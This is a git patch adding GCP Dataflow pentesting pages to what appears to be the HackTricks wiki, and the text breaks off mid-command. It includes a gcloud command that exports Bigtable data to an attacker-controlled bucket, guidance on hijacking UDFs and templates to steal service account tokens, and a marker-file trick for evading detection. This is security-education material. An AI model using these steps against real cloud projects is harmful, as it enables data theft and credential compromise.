From 936fbc42858cf0140f28cb4af7ff3d3fd2ca5060 Mon Sep 17 00:00:00 2001 From: Tamir Yehuda Date: Sun, 15 Feb 2026 21:34:08 +0200 Subject: [PATCH 1/2] added new GCP Dataflow exploitation, privilege escalation, and enumeration sections --- src/SUMMARY.md | 3 + .../gcp-dataflow-post-exploitation.md | 49 +++++ .../gcp-dataflow-privesc.md | 173 ++++++++++++++++++ .../gcp-services/gcp-dataflow-enum.md | 79 ++++++++ 4 files changed, 304 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 7a747fe46..321048f71 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -95,6 +95,7 @@ - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + - [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md) - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) @@ -123,6 +124,7 @@ - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) - [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md) + - [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md) - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) @@ -176,6 +178,7 @@ - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) + - [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md) - [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md) - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md new file mode 100644 index 000000000..ae2ce9859 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md @@ -0,0 +1,49 @@ +# GCP - Dataflow Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Dataflow + +For more information about Dataflow check: + +{{#ref}} +../gcp-services/gcp-dataflow-enum.md +{{#endref}} + +### Using Dataflow to exfiltrate data from other services + +**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink) + +With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write). + +> [!NOTE] +> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified. + +#### Bigtable to GCS + +See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`. + +
+ +Export Bigtable to attacker-controlled bucket + +```bash +gcloud dataflow jobs run \ + --gcs-location=gs://dataflow-templates-us-//Cloud_Bigtable_to_GCS_Json \ + --project= \ + --region= \ + --parameters=bigtableProjectId=,bigtableInstanceId=,bigtableTableId=,filenamePrefix=,outputDirectory=gs:///raw-json/ \ + --staging-location=gs:///staging/ +``` + +
+ +#### BigQuery to GCS + +Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket. + +#### Pub/Sub and streaming sources + +Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md new file mode 100644 index 000000000..ddbbf3b5c --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md @@ -0,0 +1,173 @@ +# GCP - Dataflow Privilege Escalation + +{{#include ../../../banners/hacktricks-training.md}} + +## Dataflow + +{{#ref}} +../gcp-services/gcp-dataflow-enum.md +{{#endref}} + +### `storage.objects.create`, `storage.objects.get`, `storage.objects.update` + +Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. +With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing. +Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling). + +**Attack vectors:** +- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets +- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets + + +> [!WARNING] +> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line. + + +#### Direct exploitation via gcloud CLI + +1. Enumerate Dataflow jobs and locate the template/UDF GCS paths: + +
+ +List jobs and describe to get template path, staging location, and UDF references + +```bash +# List jobs (optionally filter by region) +gcloud dataflow jobs list --region= +gcloud dataflow jobs list --project= + +# Describe a job to get template GCS path, staging location, and any UDF/template references +gcloud dataflow jobs describe --region= --format="yaml" +# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH) +# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath +``` + +
+ +2. Download the original UDF or job template from GCS: + +
+ +Download UDF file or YAML template from bucket + +```bash +# If job references a UDF at gs://bucket/path/to/udf.py +gcloud storage cp gs:////.py ./udf_original.py + +# Or for a YAML job template +gcloud storage cp gs:////